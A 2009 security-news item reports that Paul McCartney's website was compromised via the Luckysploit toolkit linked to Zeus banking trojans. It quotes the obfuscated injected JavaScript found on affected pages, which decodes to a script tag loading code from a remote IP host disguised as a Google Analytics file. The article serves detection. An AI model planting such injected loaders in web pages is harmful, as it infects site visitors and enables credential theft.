Daily cyber threats and internet security news: network security, online safety and latest security alerts
April 7th, 2009 Compromised Through Exploit Toolkit, Visitors Might Get Private Data Stolen

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus’ activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?”; var result = “”;for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result);

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Credit: Mary Landesman, ScanSafe Blog

Share this item with others:

More on CyberInsecure:
  • New PDF Exploits Toolkit Targets Windows Users With Unpatched Adobe Reader
  • Stolen Business And Personal Data Found On Open Botnet Server
  • Insecure Online Updates Toolkit For DNS Cache Poisoning Exploited In The Wild
  • Backup Tape With Private Details Stolen From Greensboro Gynecology Associates
  • Exploit Targeting Corporate Computer Associates Users

  • If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Compromised Through Exploit Toolkit, Visitors Might Get Private Data Stolen

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.